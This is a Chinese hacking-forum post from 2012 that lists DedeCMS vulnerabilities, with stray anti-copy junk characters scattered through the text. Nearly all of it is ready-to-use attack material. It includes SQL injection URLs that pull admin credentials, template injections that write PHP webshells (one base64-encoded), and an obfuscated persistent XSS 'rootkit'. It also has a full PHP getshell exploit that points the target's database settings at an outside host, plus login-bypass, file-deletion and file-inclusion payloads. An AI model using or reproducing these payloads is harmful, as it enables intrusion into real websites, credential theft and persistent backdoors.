找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3195|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
$ w! L, l: z8 Y/ Y
Dedecms 5.6 rss注入漏洞2 a9 M' @: b1 ^1 D% l; c
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=11 m% r' G2 H5 X) u& e( o

5 [: u- g2 _; U; n
! ]1 z  A+ s+ m+ i! l! l" U' w1 F% o- s3 I1 @  w
4 l  R% ?3 g, V) _. {$ ^5 |

" `2 E1 C, P7 z2 \6 s  Q* r$ I9 f9 h) \( I& r- x' @
$ o! h# B4 X/ H. }, d* N" k9 @) j
8 r9 s$ C$ Z1 D. u% I2 C5 c
DedeCms v5.6 嵌入恶意代码执行漏洞
; k' C4 r- G5 n3 z注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}# r: G) i6 O7 {; B' U+ v
发表后查看或修改即可执行# j9 L0 M4 @6 r% t) V5 I' R
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}: W. A( u0 A& B2 _2 [+ r
生成x.php 密码xiao,直接生成一句话。8 u7 D, E$ x8 P  d+ r  V

% S3 Y$ K4 k' m
5 u! h# R, }% s: s1 M1 g& _
" l8 p5 ?) [9 q8 V
. }& u" g2 l: S6 |/ o( S! b, m: r) ?. o

# U" j/ \$ F" ^  y9 p" J6 A" V+ ]0 W; s% g$ q
. I0 ]2 h( o: f) Q) d- S5 S
Dede 5.6 GBK SQL注入漏洞
: \' v$ a2 t# F3 a3 _, v% a2 B# c
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';5 Z  P1 G1 U" \4 I
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe; I& G5 c; D4 d6 o, I9 e/ `$ R
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A77 E) y- h2 g! W. X% X6 J. L% l* Z

. g% x! Z& T: x- |/ ^8 k3 T5 j% O6 R9 _
( v4 R) j/ O+ f1 t; b! f. [/ ~
& i, G- a4 x' ^# F  z

$ R! L: m- R" x" M7 v; H. G% O/ {; M; `# _

( t4 X5 ?- J+ S( p5 M0 R" |) |% u! a+ I0 H8 h
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
- S' z& N8 C% [- I- z1 l
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
! E: [5 m7 }6 b5 ], M  V0 l4 @& ?3 H+ d
! }9 [0 K" t7 G& _5 n0 F. a

9 m: r- q% E3 _1 |* I* q, ^" S& D$ Z3 a  S+ i

  t# w0 z6 w- j! c2 j
1 k8 V& [/ t/ H7 n$ T% K" RDEDECMS 全版本 gotopage变量XSS漏洞' D7 M. ~3 |+ L3 m. e1 ]
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
  j; B6 b. H; i: z1 x2 ?0 b
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
( M  @! z! a3 T$ C7 g. W( v/ k% A; q- h

0 W: r# M- |7 X2 O  M/ a) ?2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 0 }" G" V+ M$ ~6 D
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
% ]5 j2 F9 }5 l( z; h+ _8 L7 ^3 @1 g" a: a$ z

* Q- S! [/ u" j  whttp://v57.demo.dedecms.com/dede/login.php
8 ~$ j. d1 S0 h1 D5 B! Y. q
; W' D% V, F3 A5 Q. z2 C, ]: z' s' Q( C, Q2 n
color=Red]DeDeCMS(织梦)变量覆盖getshell
8 T0 I) c! q, I! n#!usr/bin/php -w
- D' H- z" ]+ V0 Y" }2 h8 C/ u<?php0 y. R- E  W% e  g# a
error_reporting(E_ERROR);
" I' S3 R* J+ O8 K# U- Oset_time_limit(0);5 a% e" g$ B  l3 ]0 z
print_r('
' f8 P/ q% p4 O" x3 {DEDEcms Variable Coverage
& H/ n: K9 u& ?9 dExploit Author:
www.heixiaozi.comwww.webvul.com
4 i. W0 p4 l, B0 Y" z" V# W);
, I3 b! _  n1 q- kecho "\r\n";% j/ a  H' d: T
if($argv[2]==null){
; ~) X3 w" ]- M. ^  R- O$ t  M2 Xprint_r('
% D4 U) P; U& i6 o/ t+---------------------------------------------------------------------------+# v6 v) J' H- U# O) l
Usage: php '.$argv[0].' url aid path
1 Z3 Q: a2 ?# {aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/5 n) W% ~, D3 @1 r' R, ^. D) ?0 ]1 K
Example:  s2 `9 `: t9 a
php '.$argv[0].'
www.site.com 1 old. s: R$ s: ]  ]8 m
+---------------------------------------------------------------------------+
6 w( V$ v% ?7 t  V4 A  C* K');* I- {6 K5 O6 _- t$ n% p
exit;
) v/ C8 d8 k, k: u# s8 C}
  N, t+ |6 Z+ u0 |) G$url=$argv[1];
& A5 p, {% j7 c0 f- \0 Y. H$aid=$argv[2];: ?/ m. V7 |5 [$ P
$path=$argv[3];
" ~8 B; f  \& ]  U& d7 h( u$exp=Getshell($url,$aid,$path);$ ?; |0 e2 V4 U
if (strpos($exp,"OK")>12){* \- k4 i' d! e3 B
echo "
! P/ Y4 R4 E9 q' y" jExploit Success \n";
1 P$ k& x0 m* |, D) _if($aid==1)echo "& G, J  P( f( w5 L8 c2 y! ^1 B
Shell:".$url."/$path/data/cache/fuck.php\n" ;
* h, [. R) \( q  T4 r/ K. o1 W3 @$ e2 ~  b" v4 a6 E
1 Y) s  X/ s- k3 _' X1 o( c
if($aid==2)echo "* q* f( @- {7 P4 B
Shell:".$url."/$path/fuck.php\n" ;% O6 A& W, e. h* x& ]

# K2 B4 C. @  K; Y
$ K, |. @0 w, S# q* x2 B! yif($aid==3)echo "
8 u# p# s- D& ]3 n: KShell:".$url."/$path/plus/fuck.php\n";
) F0 D5 {' c7 _2 y& U3 p) I9 l9 I4 ?/ [5 \

! B& m# ^" w( _" ~) e' t+ x}else{
! Q$ ?& y- y* [2 F+ \: X( _echo "
( W4 w- |: j6 T! I7 N: D7 [! NExploit Failed \n";5 Q! ?% {& s1 [' x" D9 r5 C( r! g% Z
}
: F6 x6 ^" U# m# ?! y0 Qfunction Getshell($url,$aid,$path){* Y& L4 h* x: Z8 U
$id=$aid;* T6 h0 w: l, ^+ B; A/ z  x
$host=$url;
- L& j& v' i) N0 Q6 t$port="80";
5 b! u0 Q, s) r7 I$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
4 |, b/ J! r0 ]7 _8 \$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";, c/ s+ P+ ]) R5 \8 l, Q3 P
$data .= "Host: ".$host."\r\n";1 F+ }+ _; q0 a0 O1 g8 q. }
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
* p4 P: j& U! z/ o1 R% b- i8 Z* u2 ?$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
% r0 ]* P1 y& u) O$ e; H! k$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";+ H; `9 f6 @2 q( I' s5 o' j
//$data .= "Accept-Encoding: gzip,deflate\r\n";
" y. g% x- i$ Z$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";4 f) b6 m1 ~: X2 o( F3 [- \
$data .= "Connection: keep-alive\r\n";
" ~% K8 i. }5 q0 H$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
" I8 J$ [) o9 {$data .= "Content-Length: ".strlen($content)."\r\n\r\n";0 s7 \% W3 |! ]6 R
$data .= $content."\r\n";
* G8 O* O& g" D/ t% s6 h7 f$ock=fsockopen($host,$port);
, H- e/ h7 S. [9 F0 I+ cif (!$ock) {* C" R- X& {0 u, {  }
echo "
4 r) u. L+ U0 S2 A( eNo response from ".$host."\n";
5 r$ Y; w5 L) b* w. k9 ?# M}
- p3 Z; Z" b( p" @3 `8 ?fwrite($ock,$data);
" q2 O& r% N* e2 P; R4 Zwhile (!feof($ock)) {
$ i. h6 o( d2 [& b2 b$exp=fgets($ock, 1024);, R( u0 H* t0 I4 _3 \, n3 P- m; z
return $exp;7 t0 C8 \6 _/ n3 ^8 i
}
. G0 R: y$ b2 n7 q, V7 Y}
: p! L# r/ s% u5 P( z/ R. y' P
0 m1 I9 g/ v, a9 L+ q; ?
/ k/ [5 p# a* q& z6 q5 j& x2 ]8 E?>
! f& L( V+ [* f5 _& d. U! K# v; Z( n9 c' V2 O

. t3 f$ R  Y& h- g" z( k3 I
( S% G- R4 O# _! a- t; R4 Y
' c; V) G/ }% G& I* J* g. H) w/ }3 s, O5 B" g1 U

. d6 |; \8 N" C0 Q$ v8 ^. g# t* u3 o8 M! u: T
0 q& Q1 l) X# d/ o2 g$ H# l7 ], Z
# A9 u2 P. N! ^+ R0 U' \

% H* A6 v5 ]% Z% h, ODedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
, \. h8 h" h9 i
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root  V2 N, g1 k6 ]9 l

" H* C1 P( `% e3 z& r0 P4 f
# s- h$ s; h' ~把上面validate=dcug改为当前的验证码,即可直接进入网站后台
+ k; c9 u, }/ n# r6 N3 R. J+ p8 G+ }- A
; X6 \: S) ~7 W: n; x/ A
此漏洞的前提是必须得到后台路径才能实现
; f/ e9 p+ w# Z6 y$ u2 L- b* b/ X) v0 U) O7 l
" d0 k* u3 c( R7 H# z0 N( [

9 G# Z  c+ w, o
' |. u5 b( L2 F( X  U* V/ Y! _8 R1 C7 ~, g3 g/ I
2 k5 R9 c9 b+ O# V$ K

% ~6 @, s: E) ]! v  X* A+ e6 ~
& ?2 v9 {; g& ^2 b7 b( Z4 [
# h+ n0 L8 D# v0 ]
# P. A% Q& k) M* b  ~0 DDedecms织梦 标签远程文件写入漏洞
/ \5 }6 p. P% z前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');3 j- R6 G; v3 S- l, b# N+ N$ E

  j0 l6 N& k" K3 u
. w$ r9 ]3 t. z再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 ! _5 \$ ?6 l, o' B! J4 ]
<form action="" method="post" name="QuickSearch" id="QuickSearch">0 @0 t1 V+ ~) Z. y! d
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />3 n: Z3 s; J/ N4 Y2 |) v+ x
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />- ?7 f0 N7 |9 m1 |; F: @
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />0 \. V; k1 h  Q
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
- F7 h- Q( m( K<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />) r: M- D  Q0 P3 h7 C  b: p+ ]5 C1 `
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
" }  X& w5 B+ S: q. Z  W, x<input type="text" value="true" name="nocache" style="width:400">
. y4 }; o2 |1 R9 T* _<input type="submit" value="提交" name="QuickSearchBtn"><br />
/ i$ U+ ]8 b  j$ q</form>6 g/ u0 v9 t7 `% n, u6 H
<script>& `% G* e; D; r$ e
function addaction()( z8 |3 x7 B- p
{& S, k& B. l! r% h% |! F
document.QuickSearch.action=document.QuickSearch.doaction.value;5 M: {6 d) B9 f
}
/ Z9 t. ]$ q9 U- t4 {& _</script>
3 r  \+ O2 u, l( ]# U% N
2 l% h1 G5 R5 ~; }4 ~4 }
$ S7 i( i3 \) U
% `2 X# |- s+ H  L, r1 q& o7 E% Z  |
8 ?. F, k. O, Q' |" ?- ~
% S$ s9 }) x) |0 V5 \3 R7 H
; {- S1 F6 R) y8 [
- r/ Q' L7 W" ]- a- M/ S
- b: ^0 m0 y3 d! k) `- s" p: b* Q9 Z9 q1 Y0 d4 N6 `+ `8 U' r- |
# d. E5 {5 R+ M" w. R- V
DedeCms v5.6 嵌入恶意代码执行漏洞
" P* m+ i" E, i" l- I! ^注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行+ F' Y9 `: h! s/ s
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}4 Z) V" C! ?# _( W  @
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
) j: e9 W0 U' q9 t; DDedecms <= V5.6 Final模板执行漏洞1 Z2 G6 L; H! M! }; b# R4 n
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:; ]0 ^5 w8 y7 ^; Y
uploads/userup/2/12OMX04-15A.jpg9 z0 L' [% ]7 Q9 G

3 V5 c  w% x5 g/ b; {8 {: q& B; ^5 Q! G2 s1 h
模板内容是(如果限制图片格式,加gif89a):4 ~3 j& K3 E- ?5 a1 p1 p' P5 r! N
{dede:name runphp='yes'}. ]0 z8 n/ Y) }9 Q. H7 G8 d
$fp = @fopen("1.php", 'a');0 H' D+ E" p( T
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");9 V6 K+ p0 J+ g2 `! K% q4 S2 h
@fclose($fp);/ H! u: U. [8 n) f# E
{/dede:name}
. Z) f, @- t6 P2 修改刚刚发表的文章,查看源文件,构造一个表单:# f, I" J% B- b3 ?5 p% f
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">8 E3 c6 b% _: N. n7 h% E2 r& x
<input type="hidden" name="dopost" value="save" />
+ g# ?" z/ ]% z' |3 z2 @+ \3 B<input type="hidden" name="aid" value="2" />
- S7 @. B* L9 ^& X2 g<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />( r+ c# c" Z# Q2 A& ^/ ~
<input type="hidden" name="channelid" value="1" />( K# c6 h' M$ l! ]+ o
<input type="hidden" name="oldlitpic" value="" />0 X9 V3 L; s% ^9 `! B  B. a
<input type="hidden" name="sortrank" value="1275972263" />
7 d: W" e& U! w) {4 j- N& \0 \; [- e

. v! |0 s5 T6 n2 f% w. ~# f; |<div id="mainCp">" d5 \7 S1 F; u( _5 N
<h3 class="meTitle"><strong>修改文章</strong></h3>
# i( o. @- R* ^4 q6 N7 {
8 f5 V; S# Z5 e) [+ p6 F( P- p
5 ?9 H9 B6 \" l* ~* \- p' S<div class="postForm">
. i  O. ]! A& n$ @: ~  n<label>标题:</label>
. _: s5 N4 U( }* ]; Z+ i1 {<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
+ T6 A: N( J# q2 m3 A4 t! q# P
" x3 d$ |, V$ E2 s7 H9 E0 o) ]2 O
<label>标签TAG:</label>
' c) ^+ t) u4 o8 J6 x- h<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)0 A5 ]5 y( n% Z; L5 b7 U
8 P% l4 j& B8 `

  l( `5 i# b1 @; P<label>作者:</label>
+ R7 G" o% l  |<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
. z: ^3 r6 r/ e+ q
) v- x) f! N8 `; M9 g" }+ ~& h
4 N' ?# d5 m  z# U2 S7 Q" u<label>隶属栏目:</label>
7 H4 c2 A# r, f/ s1 z<select name='typeid' size='1'>
  Y- `5 l6 {& i2 J<option value='1' class='option3' selected=''>测试栏目</option>" g, ~0 ]4 a, }  {
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
& z8 B  q1 M$ E# C
7 L& c) `! k1 P) U7 o) V6 s$ f2 _- g; Y6 J' f5 ]2 E! R$ z
<label>我的分类:</label>, v$ U+ V( ^! @/ L& A
<select name='mtypesid' size='1'>
6 q4 G$ F( [* j  z<option value='0' selected>请选择分类...</option>. U5 ^  H% b5 {
<option value='1' class='option3' selected>hahahha</option>8 w8 |( w' p% Z- p! @: a1 U: U+ e
</select>8 \* T1 V" v: l+ p+ W5 C0 _, a
( H  o5 s9 c7 U$ C9 T
! {* H" `/ P: K6 E1 z. Y  |- t
<label>信息摘要:</label>4 Y5 R$ u7 X4 j% N$ {
<textarea name="description" id="description">1111111</textarea>
) o+ P5 k  N, f% ]( z9 r( @(内容的简要说明)' E+ G( A& `& b7 Q9 f

- w" `; `/ A6 [& `8 m' f; {- _: T. {% z3 v5 x3 F8 n. i: e+ l
<label>缩略图:</label>; y7 U4 [; X7 y) f8 O9 `
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>4 p& s3 [# V4 `' \8 p! m

9 h. Y! D: j2 D. N1 M) ~6 j6 w6 }: A$ D  t$ V1 B
<input type='text' name='templet'
5 i) \7 O3 J6 [value="../ uploads/userup/2/12OMX04-15A.jpg">
2 _2 r' W3 R) E4 g3 \+ |<input type='text' name='dede_addonfields'
, O4 A( o3 t0 b6 v9 kvalue="templet,htmltext;">(这里构造)
( k0 x1 U0 y9 D3 W. Z  _</div>( p. l* y) W# N

% X( O. m& l' e$ t8 M( k( A4 @; l7 V: Q7 E) O
<!-- 表单操作区域 -->1 o/ k. u0 p% \% }3 a8 j3 ~
<h3 class="meTitle">详细内容</h3>
; Y4 j8 c& d+ @+ J, n  e" \' ]# |# Z+ k: v# M1 r

, L4 W) R- H8 l- {4 U8 q, d<div class="contentShow postForm">
0 G7 H: a' q4 n* U7 t9 _. g<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
/ F  {2 z" s" |  O  H1 |& h
4 Z& ^4 A# E6 V. N- g, `6 Z! T" L. H# R0 R, N1 b4 T& ]; r
<label>验证码:</label>
. N" [' G$ }, D* e- z& x<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
8 O3 z8 t* u7 `7 m<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
- b% T3 g9 R% a0 m
/ F; X; p# I  G
( w9 H! N) {5 O1 {! H' E<button class="button2" type="submit">提交</button>
8 V1 u3 R( s' I% w7 z<button class="button2 ml10" type="reset">重置</button>, U0 X5 R/ z8 h0 I
</div>
  I/ U2 v. a9 h. e
0 o$ ?- z, Y3 s- [6 L7 ]/ I$ Q6 @6 g2 W! y* m) F' n6 h( t/ j
</div>' v5 f  T" {! |% \3 s
0 c" O/ V$ |  t3 q( o

4 h. ~, L- ^# U</form>4 L3 R  v" {, Q, p$ {' B# L+ N

# f" A5 e5 ?3 _; T2 p3 T' H2 h9 Y. G" [; |6 [
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:9 W' G; Y% N5 J8 H, ~
假设刚刚修改的文章的aid为2,则我们只需要访问:6 s3 Y, z+ B% X* v% ?/ u$ o
http://127.0.0.1/dede/plus/view.php?aid=2
% S% H* c1 w+ J! Y1 `3 A即可以在plus目录下生成webshell:1.php
% s8 y  l  @. S4 t
+ Y# R" Q5 K/ R6 s: N& p0 {* f( [2 M+ g' C* ]

' f% g" @2 X* m2 d$ t3 P! p: z' ^2 M4 Q, Q
* N, L, ~" t; l* F! ?

' ^7 K  I7 _: r' t! x) ^$ p2 q
. T' g+ K3 _, g* s; H
4 W$ j8 L$ R# l9 Z2 a) }
. r+ i: u" B; c6 O  H2 @% L0 v; p2 u  W) d' ?3 j
7 X6 _9 M% L' G+ D5 Z
6 R, U- J/ @0 `( ?5 R- E$ ^1 h% W
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
* x' b: ]) U) h/ a. |+ oGif89a{dede:field name='toby57' runphp='yes'}& X) H2 d- v& X) ~' B& }3 w
phpinfo();. w) B( a6 _! E
{/dede:field}6 R% e: U& [% c; g) M4 A
保存为1.gif5 A5 m9 K/ x7 R" [3 B" ]! [
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> ) A; m. Y3 u7 ^8 V2 g9 \1 G! ?
<input type="hidden" name="aid" value="7" /> " m# X/ E' `' q& B& Q4 D/ g. [
<input type="hidden" name="mediatype" value="1" />
) d) L3 e0 j. e4 m9 T4 y<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 3 f( G: c( a2 b  c' F
<input type="hidden" name="dopost" value="save" /> 2 y' x; J& [% s5 a
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 1 e! }- b2 K. M8 D% z
<input name="addonfile" type="file" id="addonfile"/>
) V1 D: @5 r! L6 X+ l' H& P: z<button class="button2" type="submit" >更改</button> 2 ]' k. ?8 O* f# O* O
</form> 5 O, ?! b; G9 m  g8 q
$ k- f8 o0 q2 b

7 c+ o# z; W/ z. w; |构造如上表单,上传后图片保存为/uploads/userup/3/1.gif  o2 M8 \4 d# H1 L7 e/ }
发表文章,然后构造修改表单如下:/ ]. z0 b, H1 M$ }+ o% ?
" M( S* m/ E; ~" n9 d. S& J
) p2 t! a4 E+ y( S
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
5 P4 E" J; h! s<input type="hidden" name="dopost" value="save" />
& x% D( X, H2 N1 d' ?% [) A<input type="hidden" name="aid" value="2" /> 8 s2 p8 H4 c6 ^0 s9 W5 u" C7 W
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
; A; S+ G3 y( O& F3 ~0 H<input type="hidden" name="channelid" value="1" /> ( V7 E% o$ N$ v9 }- D
<input type="hidden" name="oldlitpic" value="" />
* V# f4 g# d: k2 g$ J+ n<input type="hidden" name="sortrank" value="1282049150" />
& o) ^  j; ~/ z+ m2 E) S<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> - A9 \, t) C5 Y
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
! I7 K7 a. \. [* n. W<select name='typeid' size='1'> % d; C8 M# g# N$ C. w! `. m. q
<option value='1' class='option3' selected=''>Test</option>
- ?& I+ L! U6 ^1 X0 o: Q<select name='mtypesid' size='1'> 4 w% i2 S5 p8 H8 Y0 R+ N9 V
<option value='0' selected>请选择分类...</option> 2 v3 B" u( |! V1 c5 n
<option value='1' class='option3' selected>aa</option></select> + [! w  [6 G: I6 r$ N
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>   x! x7 ~* H* j1 T7 j/ k5 }
<input type='hidden' name='dede_addonfields' value="templet">
: u; z# G* X% |8 Q<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
  W2 l# f5 W' k, w; i+ C" g  ?+ {<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 3 r$ N. O  J  O0 Y. p
<button class="button2" type="submit">提交</button>
3 q. P1 p4 S5 M/ \</form>3 r2 E* B' M9 G
6 |# y. V, E3 }  ?6 `/ y: l

  _0 h: O" ]$ K# H
" [5 Z1 P! ~7 @  I: n8 A& H  z# B3 T+ O
& v* h$ h  O. ?2 n( A6 r

- v! f, n& `+ Y8 A
# C5 T2 w( A# E) Z, Y5 V# @1 O  x# x+ p0 e
6 l9 z7 I) ~( t+ b- m+ u8 }

& W( v6 h9 M1 c( P6 t
* n0 {6 ?8 ~9 V: O! x' \  R
6 ~2 z& i4 ^3 D, s织梦(Dedecms)V5.6 远程文件删除漏洞4 Z0 r# `* W( u- u
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
% D0 m* l% H6 f5 o& Z" f2 g! w, e
) t+ M% \  K& R
6 W. j  Y  [6 M  C# K! E

# c. ?# b( m/ X' r* V% H: i7 J2 w
- w/ M$ N5 W2 S( q( N* h8 x- x3 I1 f7 N" Q; _6 c+ }
2 g% k+ R! T2 O! Z4 B+ k$ M, u
5 K" n- \* H6 I- B4 a# `

2 |7 n- Y$ ^$ D$ T! }% F* H: T
3 Z8 ~5 U9 J. F# G& G! I8 p( x织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
/ i4 }% B( K. X, O- h. h! b
http://www.test.com/plus/carbuya ... urn&code=../../
! {! D) }! y3 c5 `6 b8 f$ D7 C1 V4 t- c8 u9 n: l
2 Y2 N& c$ V& P; n

6 D7 b% v: v, D8 X8 n
8 z+ R4 p7 @- f2 g% T& t* P. U( l7 W7 s6 _% ~% X

' L( \# u% [  j$ [- x! o
# J5 E) y- [) n/ j* K8 r7 W
3 W$ B# c/ a' }
. ^! ]% R) }" |' S( a! A- A: V% ?. r% p: t3 P
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 . Z  p' p0 w! P. P
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`2 i) l/ W1 ?2 u; g+ z9 @) M
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD57 D0 P4 V+ O$ o4 |9 A) z
0 |! D9 u8 R! W6 R4 O

' X( i# D9 D7 t* P4 ~
- q& `7 Z, g9 w/ X& [
+ V  c) ]# o, l$ l. Z* C& D" l6 Y2 i2 v" K) w
- s% A- |* @: U1 N# B2 i2 @
# u+ D6 p9 V* \

: p! T8 V3 c6 k' L" O5 B) x; B  F" A+ k* C
' A2 \- K1 A! B  B$ Y
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞1 r6 m3 w# n# j4 q$ v( L; o; u# n  U3 m
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
* l) l; n* q* f" B) a$ E* \% b5 S8 T" S; `, ~
& `: D1 W$ Z- m) b5 }( I

. R; A/ e, [+ ?4 m2 J( Q( M
- j' t# e# b8 [# @$ C$ ^* _8 e3 p* u  q9 F

$ y0 y$ l; G: |9 U) x3 U& ?; e6 h3 @6 r8 f$ f# U4 l

1 M2 E: @! E- Z5 p4 c: Q. Q; C2 B/ Z2 w% j. P/ d6 ^$ e# v1 w9 u
